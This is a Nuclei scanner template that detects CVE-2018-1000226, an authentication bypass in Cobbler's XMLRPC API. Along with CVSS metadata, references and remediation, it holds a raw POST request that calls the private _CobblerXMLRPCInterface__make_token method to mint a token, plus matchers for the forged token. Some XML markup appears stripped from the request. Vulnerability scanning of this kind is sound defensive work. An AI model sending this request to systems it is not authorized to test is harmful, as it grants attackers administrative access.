id: CVE-2018-1000226 info: name: Cobbler - Authentication Bypass author: c-sh0 severity: critical description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931. remediation: | Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler. reference: - https://github.com/cobbler/cobbler/issues/1916 - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/ - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-1000226 cwe-id: CWE-732 epss-score: 0.01309 epss-percentile: 0.8563 cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cobblerd product: cobbler tags: cve2018,cve,cobbler,auth-bypass,cobblerd http: - raw: - | POST {{BaseURL}}/cobbler_api HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml _CobblerXMLRPCInterface__make_token cobbler matchers-condition: and matchers: - type: dsl dsl: - "!contains(tolower(body), 'faultCode')" - type: word part: header words: - "Content-Type: text/xml" - type: word part: body words: - "" - type: regex part: body regex: - "(.*[a-zA-Z0-9].+==)" - type: status status: - 200 # digest: 4a0a0047304502201a7c5859f426d96f45cd86e280a49186d9b9ea388944c9ac9aa3c03a68f61219022100faca8e8923400b4cdf7ce1d714dde9bf2ed095375ead8f2870d6385412ee7e4e:922c64590222798bb761d5b6d8e72950